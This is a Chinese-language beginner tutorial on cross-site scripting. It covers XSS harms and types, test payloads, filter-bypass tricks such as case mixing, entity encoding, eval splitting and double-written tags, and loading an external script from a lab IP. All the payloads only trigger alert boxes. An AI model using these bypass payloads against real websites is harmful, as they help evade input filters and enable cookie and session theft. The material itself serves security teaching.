XSS漏洞基礎(chǔ)知識(shí)有哪些

發(fā)布時(shí)間：2021-12-10 09:21:00 來源：億速云閱讀：191 作者：柒染欄目：大數(shù)據(jù)

XSS漏洞基礎(chǔ)知識(shí)有哪些，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

一、XSS漏洞危害

1、盜取各種用戶賬號(hào)

2、竊取用戶cookie

3、劫持用戶會(huì)話

4、刷流量，執(zhí)行彈窗

二、漏洞驗(yàn)證

1、在登錄框輸入下面代碼,點(diǎn)擊登錄

<script>alert(123)</script>

XSS漏洞基礎(chǔ)知識(shí)有哪些

2、彈出對(duì)話框，說明存在xss漏洞

XSS漏洞基礎(chǔ)知識(shí)有哪些

三、漏洞分類

1、反射型

只能利用一次，必須構(gòu)造特殊的連接讓目標(biāo)點(diǎn)擊，比如上面的登錄界面。

2、存儲(chǔ)型

將特殊語句存儲(chǔ)到頁(yè)面，只要目標(biāo)瀏覽該網(wǎng)頁(yè)，就會(huì)被攻擊，比如留言板。

3、DOM型

不與服務(wù)器進(jìn)行交互，利用在本地渲染網(wǎng)頁(yè)時(shí)觸發(fā)

四、payload構(gòu)造

偽協(xié)議

<a href="javascript:alert(123)">aiyou</a>

事件

<img src="./1.jpg" onmouseover='alert(123)'><img src="#" onerror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">

五、繞過防護(hù)

1、大小寫繞過

<SCript>alert(123)</SCript>

2、引號(hào)的使用

<img src="#" onerror="alert(123)"/><img src='#' onerror='alert(123)'/><img src=# onerror=alert(123) />

3、“/”代替空格

<img/src='#'/Onerror='alert(123)'>

4、對(duì)標(biāo)簽屬性值轉(zhuǎn)碼

字母 ASCII 十進(jìn)制編碼十六進(jìn)制編碼

a 97 a a

<a href="j&#97;v&#x61script:alert(123)">aiyou</a>

5、頭插入尾插入

<a href="&#01;j&#97;v&#x61script:alert(123)&#02;">aiyou</a>

6、拆分

<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>

7、雙寫繞過

<scrscriptipt>alert(123)</scscriptript>

六、外部調(diào)用

1、新建一個(gè)xss.js，內(nèi)容為

alert(213);

2、構(gòu)建paylaod,提交

<script src="http://192.168.1.129/js/xss.js"></script>

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝您對(duì)億速云的支持。

向AI問一下細(xì)節(jié)

XSS漏洞基礎(chǔ)知識(shí)有哪些

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽